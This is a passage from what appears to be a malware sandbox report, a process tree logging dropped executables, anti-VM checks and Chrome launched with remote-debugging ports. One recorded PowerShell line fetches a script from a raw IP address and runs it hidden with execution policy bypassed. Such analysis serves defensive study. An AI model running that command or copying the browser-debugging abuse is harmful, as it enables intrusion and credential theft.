        ctfmon.exe
        8⤵
        
        PID:2532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:2
        8⤵
        
        PID:1212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:8
        8⤵
        
        PID:2252
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:8
        8⤵
        
        PID:1360
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2648 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:2
        8⤵
        
        PID:2072
      - C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1108
      - C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
        6⤵
        Executes dropped EXE
        
        PID:1968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D99.tmp\7D9A.tmp\7D9B.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
        7⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
      - C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1932
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 1204
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2348
      - C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 1012
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:2512
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 508
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:1924
      - C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:1704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778
        9⤵
        
        PID:1968
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:2424
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2
        9⤵
        
        PID:3760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
        9⤵
        
        PID:920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
        9⤵
        
        PID:1580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2
        9⤵
        
        PID:3088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2216 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3472 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
        9⤵
        
        PID:3044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
        9⤵
        
        PID:2140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3748 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
        9⤵
        
        PID:2696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Guest Profile"
        8⤵
        Uses browser remote debugging
        
        PID:3688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778
        9⤵
        
        PID:3460
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:2060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2
        9⤵
        
        PID:3304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8
        9⤵
        
        PID:3736
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8
        9⤵
        
        PID:2828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2692 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2476
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2016 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2
        9⤵
        
        PID:2096
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8
        9⤵
        
        PID:3436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="System Profile"
        8⤵
        Uses browser remote debugging
        
        PID:2644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778
        9⤵
        
        PID:3396
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:3376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1064 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2
        9⤵
        
        PID:344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8
        9⤵
        
        PID:3220
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8
        9⤵
        
        PID:1644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2176 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:484
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3844
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2
        9⤵
        
        PID:2416
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3784 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8
        9⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 496
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1156
      - C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"
        6⤵
        Executes dropped EXE
        
        PID:2704
      - C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:1148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6879758,0x7fef6879768,0x7fef6879778
        8⤵
        
        PID:2216
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:540
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:2
        8⤵
        
        PID:2116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8
        8⤵
        
        PID:2308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8
        8⤵
        
        PID:1704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2644 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1928
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1304 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:2
        8⤵
        
        PID:1496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8
        8⤵
        
        PID:3568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
